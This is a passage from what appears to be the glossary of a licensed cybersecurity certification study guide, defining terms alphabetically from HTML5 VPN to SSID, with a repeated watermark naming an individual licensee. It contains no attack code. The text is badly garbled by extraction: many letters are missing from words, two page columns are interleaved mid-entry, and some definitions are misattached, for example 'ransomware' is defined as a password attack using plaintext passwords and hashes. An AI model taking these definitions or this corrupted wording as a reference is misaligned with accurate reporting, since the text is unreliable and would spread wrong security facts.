HTML5 VPN sing features of TML
to implement remote desktop N since the last full or incremental backup
connections via browser software
(clientless).
hybrid cloud A cloud deployment that
uses both private and public elements.
IaaS (Infrastructure as a Service) A
computing method that uses the cloud to
provide any or all infrastructure needs.
IaC (infrastructure as code) A
provisioning architecture in which
deployment of resources is performed by
scripted automation and orchestration.
IAM (identity and access management)
A security process that provides
identification, authentication, and
authori ation mechanisms for users,
computers, and other entities to work
with organi ational assets like networks,
operating systems, and applications.
ICS (industrial control system) A
network managing embedded devices
(computer systems that are designed to
perform a specific, dedicated function .
identity fraud The invention of fake
personal information or the theft and
misuse of an individual's personal
information.
IdP (identity provider) In a federated
network, the service that holds the user
account and performs authentication.
IDS (intrusion detection system) A
software and or hardware system that
scans, audits, and monitors the security
infrastructure for signs of attacks in
progress.
IEEE 802.1X A standard for encapsulating
EAP communications over a LAN (EAPoL)
to implement port-based authentication.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
Glossary | G-11
IKE (Internet Key Exchange) Framework
for creating a Security Association (SA)
used with IPSec. An SA establishes that
two hosts trust one another (authenticate)
and agree secure protocols and cipher
suites to use to exchange data.
implicit deny A basic principle of security
stating that unless something has
e plicitly been granted access, it should
be denied access.
incremental backup A backup type in
which all selected files that have changed
(whichever was most recent) are backed
up.
industrial camou a e Methods of
disguising the nature and purpose of
buildings or parts of buildings.
inherent risk Risk that an event will pose
if no controls are put in place to mitigate
it.
input validation Any technique used to
ensure that the data entered into a field
or variable in an application is handled
appropriately by that application.
insecure object reference Coding
vulnerability where unvalidated input is
used to select a resource ob ect, such as a
file or database.
insider threat A type of threat actor who
is assigned privileges on the system that
cause an intentional or unintentional
incident.
inte er o er o An attack in which a
computed result is too large to fit in its
assigned storage space, which may lead
to crashing or data corruption, and may
trigger a bu er over ow. integrity The
fundamental security goal of keeping
organi ational information accurate,
free of errors, and without unauthori ed
modifications.
intelligence fusion In threat hunting,
using sources of threat intelligence data
to automate detection of adversary IoCs
and TTPs.
intranet A private network that is only
accessible by the organization's own
personnel.
Glossary
 G-12 | Glossary
IoC (indicator of compromise) A sign
that an asset or network has been
attacked or is currently under attack.
IPAM (IP address management)
Software consolidating management
of multiple D C and DN services
to provide oversight into IP address
allocation across an enterprise network.
IPFIX (IP Flow Information Export)
tandards based version of the Net ow
framework.
IPS (intrusion prevention system) An
IDS that can actively block attacks.
I ec Internet rotocol ecurit A
set of open, non proprietary standards
that are used to secure data through
authentication and encryption as the data
travels across the network or the Internet.
IRP (incident response plan) pecific
procedures that must be performed if a
certain type of event is detected or reported.
ISA (interconnection security
agreement) Any federal agency
interconnecting its IT system to a third-
party must create an ISA to govern the
relationship. An ISA sets out a security
risk awareness process and commit the
agency and supplier to implementing
security controls.
ISAC (Information Sharing and Analysis
Center) Not for profit group set up to
share sector specific threat intelligence
and security best practices amongst its
members.
ISO/IEC 27K (International Organization
for Standardization 27000 Series)
A comprehensive set of standards
for information security, including
best practices for security and risk
management, compliance, and technical
implementation.
ISO/IEC 31K (International Organization
for Standardization 31000 Series) A
comprehensive set of standards for
enterprise risk management.
IV attack (Initialization Vector Attack)
A wireless attack where the attacker
is able to predict or control the IV of
an encryption process, thus giving the
attacker access to view the encrypted
data that is supposed to be hidden from
everyone else except the user or network.
Glossary
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
jamming An attack in which radio waves
disrupt 802.11 wireless signals.
job rotation The policy of preventing any
one individual performing the same role
or tasks for too long. This deters fraud
and provides better oversight of the
person's duties.
jump server A hardened server that
provides access to other hosts. Also
known as jumpbox.
Kerberos A single sign-on authentication
and authorization service that is based on
a time-sensitive ticket-granting system.
keylogger Malicious software or
hardware that can record user keystrokes.
kill chain A model developed by
Lockheed Martin that describes the stages
by which a threat actor progresses a
network intrusion.
L2TP (Layer 2 Tunneling Protocol) VPN
protocol for tunneling PPP sessions across
a variety of network protocols such as I ,
rame elay, or ATM.
lateral movement The process by which
an attacker is able to move from one part
of a computing environment to another.
LDAP (Lightweight Directory Access
Protocol) A network protocol used to
access network directory databases,
which store information about authorized
users and their privileges, as well as other
organizational information.
LDAP injection An application attack
that targets web-based applications by
fabricating LDAP statements that are
typically created by user input.
LDAPS (Lightweight Directory
Access Protocol Secure) A method
of implementing LDA using L TL
encryption.
LEAP (Lightweight Extensible
Authentication Protocol) Cisco Systems'
proprietary EAP implementation.
least privilege A basic principle of
security stating that something should be
allocated the minimum necessary rights,
privileges, or information to perform its
role.

lightweight cryptography Cryptographic
algorithms with reduced compute
requirements that are suitable for use in
resource constrained environments, such
as battery-powered devices.
LLR (lessons learned report) An analysis
of events that can provide insight into
how to improve response processes in the
future. Also known as after action report
or AAR.
load balancer A type of switch or
router that distributes client requests
between di erent resources, such as
communications links or similarly-
configured servers. This provides fault
tolerance and improves throughput.
logger command Linux utility that writes
data to the system log.
logic bomb A malicious program or
script that is set to run under particular
circumstances or in response to a defined
event.
loop protection If broadcast traffic
is allowed to continually loop around
a network, the number of broadcast
packets increases e ponentially, crashing
the network. Loop protection in switches
such as panning Tree rotocol , and
in routers (Time To Live for instance) is
designed to prevent this.
MaaS (monitoring as a service) Cloud
service providing ongoing security and
availability monitoring of on-premises
and or cloud based hosts and services.
MAC (Mandatory Access Control) Access
control model where resources are
protected by in e ible, system defined
rules. Resources (objects) and users
(subjects) are allocated a clearance level
or label .
MAC (Message Authentication Code)
Proving the integrity and authenticity of
a message by combining its hash with a
shared secret.
MAC cloning (Media Access Control
cloning) An attack in which an attacker
falsifies the factory assigned MAC address
of a device's network interface. Also
known as MAC spoofing.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
Glossary | G-13
AC filterin edia Access Control
filterin Applying an access control list to
a switch or access point so that only clients
with approved MAC addresses can connect
to it.
AC oodin A variation of an ARP
poisoning attack where a switch's cache
table is inundated with frames from
random source MAC addresses.
MAM (mobile application management)
Enterprise management function that
enables control over apps and storage for
mobile devices and other endpoints.
managerial control A category of
security control that gives oversight of the
information system.
mandatory vacations The principle that
states when and how long an employee
must take time o from work so that their
activities may be subjected to a security
review.
maneuver In threat hunting, the concept
that threat actor and defender may use
deception or counterattacking strategies
to gain positional advantage.
mantrap (access control vestibule) A
secure entry system with two gateways,
only one of which is open at any one time.
MD5 (Message Digest Algorithm v5) A
cryptographic hash function producing a
128-bit output.
MDM (mobile device management) The
process and supporting technologies for
tracking, controlling, and securing the
organization's mobile infrastructure.
measured boot A UEFI feature that
gathers secure metrics to validate the
boot process in an attestation report.
MEF (mission essential function) A
business or organizational activity that
is too critical to be deferred for anything
more than a few hours, if at all.
memdump command Linux utility
developed as part of the Coroner's Toolkit
to dump system memory data to a file.
memory leak A software vulnerability
that can occur when software does not
release allocated memory when it is done
using it, potentially leading to system
instability.
Glossary
 G-14 | Glossary
metadata Information stored or recorded
as a property of an ob ect, state of a
system, or transaction.
MFA (multifactor authentication) An
authentication scheme that requires the
user to present at least two di erent
factors as credentials, from something
you know, something you have,
something you are, something you do,
and somewhere you are. Specifying two
factors is known as 2FA.
microservices A software architecture
where components of the solution are
conceived as highly decoupled services
not dependent on a single platform type
or technology.
mirroring A type of RAID that using two
hard disks, providing the simplest way of
protecting a single disk against failure.
Data is written to both disks and can be
read from either disk.
MitB attack (Man-in-the-Browser
attack) An attack when the web browser
is compromised by installing malicious
plug ins or scripts, or intercepting A I calls
between the browser process and DLLs.
MitM attack (Man-in-the-Middle
attack) A form of eavesdropping where
the attacker makes an independent
connection between two victims and
steals information to use fraudulently.
MMS (multimedia messaging service)
Extension to SMS allowing digital data
picture, video, or audio to be sent over a
cellular data connection.
mode of operation Implementation of a
block symmetric cipher, with some modes
allowing secure encryption of a stream of
data, with or without authentication for
each block.
MoU (memorandum of understanding)
Usually a preliminary or exploratory
agreement to express an intent to work
together that is not legally binding and
does not involve the exchange of money.
MPLS (Multiprotocol Label Switching)
Developed by Cisco from ATM as a
means of providing traffic engineering
congestion control , Class of ervice,
and Quality of Service within a packet
switched, rather than circuit switched,
network.
Glossary
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
MSA (measurement systems analysis)
Evaluates the data collection and
statistical methods used by a quality
management process to ensure they are
robust.
MSSP (managed security service
provider) Third-party provision of security
configuration and monitoring as an
outsourced service.
MTBF (mean time between failures)
The rating on a device or component
that predicts the expected time between
failures.
MTD (maximum tolerable downtime)
The longest period of time a business can
be inoperable without causing irrevocable
business failure.
MTTF (mean time to failure) The
average time a device or component is
expected to be in operation.
MTTR (mean time to repair/replace/
recover) The average time taken for a
device or component to be repaired,
replaced, or otherwise recover from a
failure.
multi-cloud A cloud deployment model
where the cloud consumer uses multiple
public cloud services.
multipath Overprovisioning controllers
and cabling so that a host has failover
connections to storage media.
NAC (network access control) A general
term for the collected protocols, policies,
and hardware that authenticate and
authorize access to a network at the
device level.
narrow-band Low-power cellular
networks designed to provide data
connectivity to IoT devices.
NAT (network address translation)
A routing mechanism that conceals
internal addressing schemes from the
public Internet by translating between
a single public address on the external
side of a router and private, non routable
addresses internally.
ncat Utility for reading and writing raw
data over a network connection. Also
known as netcat.

NDA (non-disclosure agreement)
An agreement that stipulates that
entities will not share confidential
information, knowledge, or materials with
unauthorized third parties.
Nessus One of the best-known
commercial vulnerability scanners,
produced by Tenable Network Security.
Also known as Tenable.
et o A Cisco-developed means of
reporting network ow information to
a structured database. NetFlow allows
better understanding of I traffic ows
as used by di erent network applications
and hosts.
NFC (Near Field Communication) A
standard for peer-to-peer (2-way) radio
communications over very short (around
distances, facilitating contactless
payment and similar technologies. NFC is
based on RFID.
NFV (network functions virtualization)
rovisioning virtual network appliances,
such as switches, routers, and firewalls,
via VMs and containers.
ne t eneration fire all
Advances in firewall technology, from
app awareness, user based filtering, and
intrusion prevention to cloud inspection.
Also known as layer firewall.
Nmap Versatile port scanner used for
topology, host, service, and discovery
and enumeration.
nonce An arbitrary number used only
once in a cryptographic communication,
often to prevent replay attacks.
non-repudiation The security goal
of ensuring that the party that sent a
transmission or created data remains
associated with that data and cannot deny
sending or creating that data.
normalization A routine that applies a
common consistent format to incoming
data so that it can be processed safely.
Normalization is referred to in the context
of log collection and software coding.
NTLM authentication (NT LAN Manager
authentication) A challenge-response
authentication protocol created by
Microsoft for use in its products.
nxlog Software optimized for multi-
platform log collection and aggregation.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
Glossary | G-15
OATH (Initiative for Open
Authentication) An industry body
comprising the main I providers,
such as erisign and ntrust, that was
established with the aim of developing an
open, strong authentication framework.
OAuth (Open Authorization) Standard
for federated identity management,
allowing resource servers or consumer
sites to work with user accounts created
and managed on a separate identity
provider.
obfuscation A technique that essentially
hides or camou ages code or other
information so that it is harder to read by
unauthorized users.
C online certificate status
protocol) Allows clients to request the
status of a digital certificate, to check
whether it is revoked.
o oardin The process of ensuring
that all and other re uirements are
covered when an employee leaves an
organization. Also known as exit interview.
o ine CA o ine certificate authorit
In I, a CA typically the root CA that has
been disconnected from the network to
protect it from compromise.
OICD (OpenID Connect) An
authentication layer that sits on top of the
OAuth 2.0 authorization protocol.
I o ect identifier Numeric schema
used for attributes of digital certificates.
onboarding The process of bringing in a
new employee, contractor, or supplier.
OOB (out-of-band management)
Accessing the administrative interface
of a network appliance using a separate
network from the usual data network.
This could use a separate VLAN or a
di erent kind of link, such as a dial up
modem.
Opal Standards for implementing
device encryption on storage devices.
operational control A category of security
control that is implemented by people.
orchestration The automation of
multiple steps in a deployment process.
order of volatility The order in which
volatile data should be recovered from
various storage locations and devices
after a security incident occurs.
Glossary
 G-16 | Glossary
OSINT (open-source intelligence)
Publicly available information plus the
tools used to aggregate and search it.
OT (operational technology) A
communications network designed to
implement an industrial control system
rather than data networking.
OTA (over the air) A firmware update
delivered on a cellular data connection.
output encoding Coding methods to
sanitize output created from user input.
OWASP (Open Web Application Security
Project) A charity and community
publishing a number of secure application
development resources.
P12 (Public Key Cryptography Standard
#12) Format that allows a private key
to be exported along with its digital
certificate.
P7B File format for transmitting a chain of
digital certificates, using C .
PaaS (Platform as a Service) A
computing method that uses the cloud to
provide any platform-type services.
PAM (pluggable authentication
module) Framework for implementing
authentication providers in Linux.
passive scan An enumeration or
vulnerability scan that analyzes only
intercepted network traffic rather
than sending probes to a target. More
generally, passive reconnaissance
techniques are those that do not require
direct interaction with the target.
PAT (port address translation) Maps
private host IP addresses onto a single
public IP address. Each host is tracked by
assigning it a random high TCP port for
communications. Also known as network
address port translation (NAPT) or NAT
overloading.
patch management Identifying, testing,
and deploying OS and application
updates. atches are often classified as
critical, security critical, recommended,
and optional.
PCI DSS (Payment Card Industry Data
Security Standard) Information security
standard for organizations that process
credit or bank card payments.
Glossary
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
PDU (power distribution unit) Advanced
strip socket that provides filtered output
voltage. A managed unit supports remote
administration.
PEAP (Protected Extensible
Authentication Protocol) EAP
implementation that uses a server-side
certificate to create a secure tunnel for
user authentication, referred to as the
inner method.
PEM (privacy-enhanced mail) ase
encoding scheme used to store certificate
and key data as ASCII text.
penetration testing A test that uses
active tools and security utilities to
evaluate security by simulating an attack
on a system. A pen test will verify that a
threat e ists, then will actively test and
bypass security controls, and will finally
exploit vulnerabilities on the system. Also
known as pentest.
percent encoding Mechanism for
encoding characters as hexadecimal
values delimited by the percent sign.
persistence (load balancing) In load
balancing, the configuration option that
enables a client to maintain a connection
with a load-balanced server over the
duration of the session. Also referred to
as sticky sessions.
persistence In cybersecurity, the ability of
a threat actor to maintain covert access to
a target host or network.
PFS (perfect forward secrecy) A
characteristic of transport encryption
that ensures if a key is compromised
the compromise will only a ect a single
session and not facilitate recovery of
plaintext data from other sessions.
PFX (personal information exchange)
indows file format for storing a private
key and certificate data. The file can be
password-protected.
pharming An impersonation attack in
which a re uest for a website, typically
an e commerce site, is redirected to a
similar looking, but fake, website.
PHI (protected/personal health
information) Information that identifies
someone as the subject of medical
and insurance records, plus associated
hospital and laboratory test results.

phishing A type of email-based social
engineering attack, in which the attacker
sends email from a supposedly reputable
source, such as a bank, to try to elicit
private information from the victim.
physical control A type of security
control that acts against in-person
intrusion attempts.
II personall identifia le in ormation
Data that can be used to identify or
contact an individual (or in the case of
identity theft, to impersonate them .
pinning A deprecated method of trusting
digital certificates that bypasses the CA
hierarchy and chain of trust to minimize
man-in-the-middle attacks.
I card personal identit erification
card) A smart card that meets the
standards for I , in that it is
resistant to tampering and provides quick
electronic authentication of the card's
owner.
PKCS (public key cryptography
standards) eries of standards defining
the use of certificate authorities and
digital certificates.
PKI (public key infrastructure)
ramework of certificate authorities,
digital certificates, software, services,
and other cryptographic components
deployed for the purpose of validating
subject identities.
playbook A checklist of actions
to perform to detect and respond
to a specific type of incident LC
(programmable logic controller) A type
of computer designed for deployment
in an industrial or outdoor setting that
can automate and monitor mechanical
systems.
PNAC (port-based network access
control) A switch (or router) that
performs some sort of authentication of
the attached device before activating the
port.
pointer dereferencing A software
vulnerability that can occur when
code attempts to read a memory
location specified by a pointer, but the
memory location is null. Also known as
dereferencing.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
Glossary | G-17
Point-to-Point/Point-to Multipoint
Topology A point-to-point topology is
one where two nodes have a dedicated
connection to one another. In a point-
to multipoint topology, a central node
mediates links between remote nodes.
Also known as Point-to-point.
port forwarding A process in which a
router takes requests from the Internet
for a particular application such as TT
and sends them to a designated host
on the LAN. Also known as destination
network address translation or DNAT.
port mirroring Copying ingress and or
egress communications from one or more
switch ports to another port. This is used
to monitor communications passing over
the switch. Also known as switched port
analyzer or SPAN.
port security Preventing a device
attached to a switch port from
communicating on the network unless it
matches a given MAC address or other
protection profile.
post-quantum Anticipating challenges to
current cryptographic implementations
and general security issues in a world
where threat actors have access to
significant uantum processing capability.
PowerShell A command shell and
scripting language built on the .NET
Framework.
PPP (Point to Point Protocol) Dial-up
protocol working at layer 2 (Data Link)
used to connect devices remotely to
networks.
PPTP (Point-to-Point Tunneling
Protocol) Developed by Cisco and
Microsoft to support VPNs over PPP
and TC I . T is highly vulnerable to
password cracking attacks and considered
obsolete.
private cloud A cloud that is deployed for
use by a single entity.
private key In asymmetric encryption, the
private key is known only to the holder
and is linked to, but not derivable from,
a public key distributed to those with
which the holder wants to communicate
securely. A private key can be used to
encrypt data that can be decrypted by the
linked public key or vice versa.
Glossary
 G-18 | Glossary
privilege access management The
use of authentication and authorization
mechanisms to provide an administrator
with centralized or decentralized control
of user and group role-based privilege
management.
privilege escalation The practice of
e ploiting aws in an operating system or
other application to gain a greater level of
access than was intended for the user or
application.
provenance In digital forensics, being
able to trace the source of evidence to a
crime scene and show that it has not been
tampered with.
proxy server A server that mediates
the communications between a client
and another server. It can filter and
often modify communications, as well
as provide caching services to improve
performance. Also known as forward
proxy.
pseudo-anonymization Removing
personal information from a data set to
make identification of individuals difficult,
even if the data set is combined with
other sources.
PSK (pre-shared key) Passphrase-based
mechanism to allow group authentication
to a wireless network. The passphrase is
used to derive an encryption key.
PtH attack (pass the hash attack) A
network-based attack where the attacker
steals hashed user credentials and uses
them as-is to try to authenticate to the
same network the hashed credentials
originated on.
public cloud A cloud that is deployed
for shared use by multiple independent
tenants.
public key During asymmetric encryption,
this key is freely distributed and can be
used to perform the reverse encryption or
decryption operation of the linked private
key in the pair.
PUP (potentially unwanted program)
oftware that cannot definitively be
classed as malicious, but may not have
been chosen by or wanted by the user.
Glossary
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
purple team A mode of penetration
testing where red and blue teams share
information and collaborate throughout
the engagement. purpose limitation
In data protection, the principle that
personal information can be collected and
processed only for a stated purpose to
which the subject has consented.
Python igh level programming language
that is widely used for automation.
QA (quality assurance) olicies,
procedures, and tools designed to ensure
defect-free development and delivery.
QoS (quality of service) Systems that
di erentiate data passing over the network
that can reserve bandwidth for particular
applications. A system that cannot
guarantee a level of available bandwidth is
often described as Class of Service (CoS).
Also known as CoS.
qualitative analysis A risk analysis
method that uses opinions and reasoning
to measure the likelihood and impact of
risk.
quantitative analysis A risk analysis
method that is based on assigning
concrete values to factors.
quantum cryptography Using quantum
computing for cryptographic tasks,
such as distributing keys or cracking
(traditional) cryptographic systems.
Quantum computing works on the
principle that its units (qubits) have more
properties than the bits used in "classical"
computers, notably and very crudely that
a qubit can have a probability of being
1 or 0 and that inspecting the value of
one qubit can instantly determine that of
others (entanglement).
RA (recovery agent) In I, an account or
combination of accounts that can copy a
cryptographic key from backup or escrow
and restore it to a subject host or user.
RA (registration authority) In I, an
authority that accepts requests for digital
certificates and authenticates the entities
making those requests.

race condition A software vulnerability
when the resulting outcome from
execution processes is directly dependent
on the order and timing of certain
events, and those events fail to e ecute
in the order and timing intended by the
developer.
RADIUS (Remote Authentication Dial-
in User Service) A standard protocol
used to manage remote and wireless
authentication infrastructures.
RAID (redundant array of independent/
inexpensive disks) pecifications that
support redundancy and fault tolerance
for di erent configurations of multiple
device storage systems. rainbow table
Tool for speeding up attacks against
Windows passwords by precomputing
possible hashes.
ransomware A type of password attack
where an attacker uses a set of related
plaintext passwords and their hashes to
crack passwords.
Raspberry Pi Open-source platform
producing programmable circuit boards
for education and industrial prototyping.
RAT (remote access Trojan) Malware
that creates a backdoor remote
administration channel to allow a threat
actor to access and control the infected
host.
RBAC (role-based access control) An
access control model where resources
are protected by ACLs that are managed
by administrators and that provide user
permissions based on job functions.
RCS (rich communication services)
Platform-independent advanced
messaging functionality designed to
replace SMS and MMS.
red team The "hostile" or attacking team
in a penetration test or incident response
exercise. regex (regular expression) A
group of characters that describe how
to e ecute a specific search pattern on a
given text.
replay attack An attack where the
attacker intercepts some authentication
data and reuses it to try to re-establish a
session.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
Glossary | G-19
replication Automatically copying
data between two processing systems
either simultaneously on both systems
(synchronous) or from a primary to a
secondary location (asynchronous).
residual risk Risk that remains even after
controls are put into place.
retention policy Dictates for how long
information needs to be kept available on
backup and archive systems. This may be
subject to legislative requirements.
reverse proxy A type of proxy server that
protects servers from direct contact with
client requests.
reverse shell A maliciously spawned
remote command shell where the
victim host opens the connection to the
attacking host.
risk acceptance The response of
determining that a risk is within
the organization's appetite and no
countermeasures other than ongoing
monitoring is needed.
risk avoidance In risk mitigation, the
practice of ceasing activity that presents
risk.
risk deterrence In risk mitigation, the
response of deploying security controls
to reduce the likelihood and or impact
of a threat scenario. Also known as risk
reduction.
risk matrix/heat map A graphical table
indicating the likelihood and impact of
risk factors identified for a work ow,
pro ect, or department for reference by
stakeholders.
risk mitigation The response of reducing
risk to fit within an organi ation's risk
appetite.
risk register A document highlighting the
results of risk assessments in an easily
comprehensible format such as a traffic
light" grid). Its purpose is for department
managers and technicians to understand
risks associated with the work ows that
they manage.
risk transference In risk mitigation,
the response of moving or sharing the
responsibility of risk to another entity,
such as by purchasing cybersecurity
insurance.
Glossary
 G-20 | Glossary

risk-based framework In A, a rule-based access control A non-

framework that uses risk assessment to
prioritize security control selection and
investment.
robot sentry A remote-controlled or
autonomous robot capable of patrolling
site premises or monitoring gateways.
root CA root certificate authorit
In I, a CA that issues certificates
to intermediate CAs in a hierarchical
structure.
rootkit A class of malware that modifies
system files, often at the kernel level, to
conceal its presence.
router fire all A hardware device that
has the primary function of a router, but
also has firewall functionality embedded
into the router firmware.
routing protocols Rules that govern how
routers communicate and forward traffic
between networks.
RPO (recovery point objective)
The longest period of time that an
organization can tolerate lost data being
unrecoverable.
RSA (Rivest Shamir Adelman) Named for
its designers, onald ivest, Adi hamir,
and Len Adelman, the first successful
algorithm for public key encryption with a
variable key length and block size.
RTBH (remote triggered black hole)
Using a trigger device to send a BGP route
update that instructs routers to drop
traffic that is suspected of attempting
DDoS.
RTO (recovery time objective) The
length of time it takes after an event to
resume normal business operations and
activities.
RTOS (real-time operating system) A
type of OS that prioritizes deterministic
execution of operations to ensure
consistent response for time-critical tasks.
RTP (Real-time Transport Protocol)
Opens a data stream for video and
voice applications over UDP. The data
is packetized and tagged with control
information (sequence numbering and
time-stamping).
discretionary access control technique
that is based on a set of operational rules
or restrictions to enforce a least privileges
permissions policy.
runbook An automated version of a
playbook that leaves clearly defined
interaction points for human analysis.
S/MIME (Secure/Multipurpose Internet
Mail Extensions) An email encryption
standard that adds digital signatures and
public key cryptography to traditional
MIME communications.
SaaS (Software as a Service) A
computing method that uses the cloud to
provide application services to users.
SAE (Simultaneous Authentication
of Equals) Personal authentication
mechanism for Wi-Fi networks introduced
with WPA3 to address vulnerabilities in
the WPA-PSK method.
salt A security countermeasure that
mitigates the impact of a rainbow table
attack by adding a random value to
("salting") each plaintext input.
SAML (Security Assertion Markup
Language) An XML-based data format used
to exchange authentication information
between a client and a service.
SAN (subject alternative name) Field
in a digital certificate allowing a host to
be identified by multiple host names
subdomains.
sandbox A computing environment that is
isolated from a host system to guarantee
that the environment runs in a controlled,
secure fashion. Communication links
between the sandbox and the host are
usually completely prohibited.
sanitization The process of thorough and
completely removing data from a storage
medium so that file remnants cannot be
recovered.
SAS (Serial Attached Small Computer
Systems Interface) Developed from
parallel C I, A represents the highest
performing hard disk interface available.
SCADA (Supervisory Control and
Data Acquisition) A type of industrial
control system that manages large scale,
multiple-site devices and equipment
spread over geographically large areas.

Glossary

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021

scalability The property by which
a computing environment is able to
gracefully fulfill its ever increasing
resource needs.
scanless Utility that runs port scans
through third-party websites to evade
detection.
SCAP (Security Content Automation
Protocol) A NIST framework that outlines
various accepted practices for automating
vulnerability scanning.
screened host A dual homed pro y
gateway server used to provide
Internet access to other network nodes,
while protecting them from e ternal
attack.
script kiddie An ine perienced, unskilled
attacker that typically uses tools or scripts
created by others.
SDK (software development kit) Coding
resources provided by a vendor to assist
with development projects that use their
platform or API.
so t are defined net or in
A Is and compatible hardware virtual
appliances allowing for programmable
network appliances and systems.
so t are defined isi ilit APIs for
reporting configuration and state data for
automated monitoring and alerting.
SE (secure erase) A method of sanitizing
a drive using the ATA command set.
SEAndroid (Security-Enhanced Android)
ince version . , Android has been based
on ecurity nhanced Linu , enabling
granular permissions for apps, container
isolation, and storage segmentation.
SECaaS (Security as a Service) A
computing method that enables clients to
take advantage of information, software,
infrastructure, and processes provided
by a cloud vendor in the specific area of
computer security.
secure boot A UEFI feature that prevents
unwanted processes from executing
during the boot operation.
security control A technology or
procedure put in place to mitigate
vulnerabilities and risk and to ensure the
confidentiality, integrity, and availability
(CIA) of information.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
Glossary | G-21
SED (self-encrypting drive) A disk drive
where the controller can automatically
encrypt data that is written to it.
segment A portion of a network where all
attached hosts can communicate freely
with one another.
SEH (structured exception handler) A
mechanism to account for unexpected
error conditions that might arise during
code e ecution. ective error handling
reduces the chances that a program could
be exploited.
sel si ned certificate A digital certificate
that has been signed by the entity that
issued it, rather than by a CA.
sentiment analysis Devising an AI ML
algorithm that can describe or classify the
intention expressed in natural language
statements.
separation of duties A concept that states
that duties and responsibilities should be
divided among individuals to prevent ethical
con icts or abuse of powers.
ser er certificate A digital certificate that
guarantees the identity of e-commerce
sites and other websites that gather and
store confidential information.
serverless A software architecture that
runs functions within virtualized runtime
containers in a cloud rather than on
dedicated server instances.
server-side In a web application, input
data that is executed or validated as part
of a script or process running on the
server.
service account A host or network
account that is designed to run a
background service, rather than to log on
interactively.
session a nit A scheduling approach
used by load balancers to route traffic
to devices that have already established
connections with the client in question.
Also known as source I affinity.
session hijacking A type of spoofing
attack where the attacker disconnects a
host then replaces it with his or her own
machine, spoofing the original host's
I address. s ow eb standard for
using sampling to record network traffic
statistics.
Glossary
 G-22 | Glossary
SFTP (Secure File Transfer Protocol)
A secure version of the File Transfer
rotocol that uses a ecure hell
tunnel as an encryption method to
transfer, access, and manage files.
SHA (Secure Hash Algorithm) A
cryptographic hashing algorithm created
to address possible weaknesses in MDA.
The current version is A .
shadow IT Computer hardware, software,
or services used on a private network
without authorization from the system
owner.
shared account An account with no
credential (guest) or one where the
credential is known to multiple persons.
shellcode Lightweight block of malicious
code that exploits a software vulnerability
to gain initial access to a victim system.
shimming The process of developing and
implementing additional code between an
application and the operating system to
enable functionality that would otherwise
be unavailable.
shoulder surfin A social engineering
tactic to obtain someone's password or
PIN by observing him or her as he or she
types it in.
I securit identifier The value
assigned to an account by Windows and
that is used by the operating system to
identify that account.
SIEM (security information and event
management) A solution that provides
real-time or near-real-time analysis of
security alerts generated by network
hardware and applications.
signature-based detection A network
monitoring system that uses a predefined
set of rules provided by a software vendor
or security personnel to identify events
that are unacceptable.
SIM (subscriber identity module) A
small chip card that identifies the user
and phone number of a mobile device,
via an International Mobile Subscriber
Identity I MI .
sinkhole A DoS attack mitigation strategy
that directs the traffic that is ooding a
target I address to a di erent network
for analysis.
Glossary
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
SIP (Session Initiation Protocol) Used
to establish, disestablish, and manage
VoIP and conferencing communications
sessions. It handles user discovery
locating a user on the network ,
availability advertising (whether a user
is prepared to receive calls , negotiating
session parameters such as use of audio
video , and session management and
termination.
SLA (service level agreement) Operating
procedures and standards for a service
contract.
SLE (single loss expectancy) The amount
that would be lost in a single occurrence
of a particular risk factor.
smart card A device similar to a credit
card that can store authentication
information, such as a user's private key,
on an embedded microchip.
smart meter A utility meter that can
submit readings to the supplier without
user intervention.
SMiShing A form of phishing that uses
SMS text messages to trick a victim into
revealing information.
sn1per Software utility designed for
penetration testing reporting and
evidence gathering that can also run
automated test suites.
SNMP (Simple Network Management
Protocol) Protocol for monitoring and
managing network devices. SNMP works
over D ports and by default.
SOA (service-oriented architecture) A
software architecture where components
of the solution are conceived as loosely
coupled services not dependent on a
single platform type or technology.
SOAP (Simple Object Access Protocol)
An XML-based web services protocol that
is used to exchange messages.
SOAR (security orchestration,
automation, and response) A class of
security tools that facilitates incident
response, threat hunting, and security
configuration by orchestrating automated
runbooks and delivering data enrichment.
SoC (system-on-chip) A processor that
integrates the platform functionality of
multiple logical controllers onto a single
chip.
 Glossary | G-23

spear phishing An email-based or web- state actor A type of threat actor that
based form of phishing which targets is supported by the resources of its host
specific individuals. country's military and security services.
Also known as nation state actor.
SPIM (spam over internet messaging)
A spam attack that is propagated through state table Information about sessions
instant messaging rather than email. between hosts that is gathered by a
stateful firewall.
split tunnel N configuration where
only traffic for the private network is stateful inspection A technique used
routed via the VPN gateway. in firewalls to analy e packets down to
the application layer rather than filtering
SPoF (single point of failure) A
packets only by header information,
component or system that would cause
enabling the firewall to enforce tighter
a complete interruption of a service if it
and more security.
failed.
steganography A technique for obscuring
SQL injection (Structured Query
the presence of a message, often by
Language injection) An attack that
embedding information within a file or
injects a database query into the input
other entity.
data directed at a server by accessing the
client side of the application. STIX (Structured Threat Information
eXpression) A framework for analyzing
SSAE SOC (Statements on Standards
cybersecurity incidents.
for Attestation Engagements
Service Organization Control) Audit stored procedure One of a set of pre-
specifications designed to ensure that compiled database statements that can
cloud hosting providers meet professional be used to validate input to a database.
standards. A SOC2 Type II report is
STP (Spanning Tree Protocol) A switching
created for a restricted audience, while
protocol that prevents network loops by
SOC3 reports are provided for general
dynamically disabling links as needed.
consumption.
stream cipher A type of symmetric
SSH (Secure Shell) A remote
encryption that combines a stream
administration and file copy program that
of plaintext bits or bytes with a
supports Ns by using port forwarding,
pseudorandom stream initialized by a
and that runs on TCP port 22.
secret key.
I ser ice set identifier A character
stress test A software testing method
string that identifies a particular wireless
that evaluates how software performs
LAN (WLAN).
